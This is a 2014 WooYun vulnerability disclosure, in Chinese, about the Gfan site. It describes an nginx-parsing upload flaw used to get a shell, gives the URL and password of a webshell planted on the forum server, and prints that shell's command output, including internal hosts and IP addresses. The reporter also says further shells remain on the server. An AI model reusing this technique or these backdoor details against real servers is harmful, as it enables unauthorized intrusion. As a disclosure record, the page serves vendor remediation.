当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083803

漏洞标题:机锋网多处运维安全隐患导致可上传后门文件一功能性服务器数据安全(getshell)

相关厂商:机锋网

漏洞作者: 我了个去

提交时间:2014-11-19 10:43

修复时间:2015-01-03 10:44

公开时间:2015-01-03 10:44

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-19: 细节已通知厂商并且等待厂商处理中
2014-11-19: 厂商已经确认,细节仅向厂商公开
2014-11-29: 细节向核心白帽子及相关领域专家公开
2014-12-09: 细节向普通白帽子公开
2014-12-19: 细节向实习白帽子公开
2015-01-03: 细节向公众公开

简要描述:

机锋网早已getshell

详细说明:

用户2700W+ 我会乱说嘛
过程较简单 ,不详细了,nginx解析,注册用户,上传头像 临时图片位置/.php getshell

漏洞证明:

由于gfan的业务都是公用的一个存储 nfs共享,而且都对磁盘有写权限,所以直接可以拿到论坛shell
一句话地址:http://bbs.gfan.com/data/diy/diy_core.php 密码:wen 不要和我说漏洞已经重复或修补了,此shell证明一切。

shell.png


[/data/bbs/program/data/diy/]$ whoami
www-data
[/data/bbs/program/data/diy/]$ hostname
php84
[/data/bbs/program/data/diy/]$ cat /etc/hosts
119.254.88.62 sdk2.entinfo.cn
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.8.8.167 api.gfan.com
10.8.8.135 bbs.gfan.com
117.79.144.130 smtp.gfanstore.com
10.8.8.169 source.mappn.com
127.0.0.1 localhost
112.90.83.87 openapi.qzone.qq.com
221.194.129.52 freeapi.hylanda.com
112.253.37.235 download006.rdb.cnc.ccgslb.net
91.189.91.14 us.archive.ubuntu.com
[/data/bbs/program/data/diy/]$ ifconfig -a
eth0 Link encap:Ethernet HWaddr 14:fe:b5:d8:39:0f
inet addr:10.8.8.84 Bcast:10.8.8.255 Mask:255.255.255.0
inet6 addr: fe80::16fe:b5ff:fed8:390f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:11045431082 errors:0 dropped:0 overruns:0 frame:0
TX packets:9275138430 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:8868587006755 (8.0 TiB) TX bytes:3115610595957 (2.8 TiB)
Interrupt:36 Memory:d6000000-d6012800
eth1 Link encap:Ethernet HWaddr 14:fe:b5:d8:39:11
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:48 Memory:d8000000-d8012800
eth2 Link encap:Ethernet HWaddr 14:fe:b5:d8:39:13
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:32 Memory:da000000-da012800
eth3 Link encap:Ethernet HWaddr 14:fe:b5:d8:39:15
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:42 Memory:dc000000-dc012800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:53635 errors:0 dropped:0 overruns:0 frame:0
TX packets:53635 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:12029502 (11.4 MiB) TX bytes:12029502 (11.4 MiB)
[/data/bbs/program/data/diy/]$ uname -a
Linux php84 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/Linux
[/data/bbs/program/data/diy/]$

修复方案:

修改nginx配置文件,或者升级nginx版本

版权声明:转载请注明来源 我了个去@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-11-19 12:07

厂商回复:

已在修复中,请问nginx哪些指令配置不当。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-11-19 10:48 | 我了个去 ( 普通白帽子 | Rank:139 漏洞数:14 | 4892057@qq.com ...)

    发的仓促,多谢管理帮忙整理格式。

  2. 2014-11-19 11:01 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @我了个去 那么着急 :P

  3. 2014-11-19 11:06 | 我了个去 ( 普通白帽子 | Rank:139 漏洞数:14 | 4892057@qq.com ...)

    @疯狗 :)

  4. 2014-11-19 13:06 | 我了个去 ( 普通白帽子 | Rank:139 漏洞数:14 | 4892057@qq.com ...)

    刚看了下,nginx解析和nfs共享的问题已经处理了,前一两个月前还存在,不过shell你没有删除干净,仔细检查下吧,至少还有两个,如果找不到加我扣扣 四八九二零五七 详谈

  5. 2014-11-19 18:45 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @我了个去 惊呆

  6. 2014-11-21 11:54 | 机锋网(乌云厂商)

    @我了个去 已经处理,谢谢。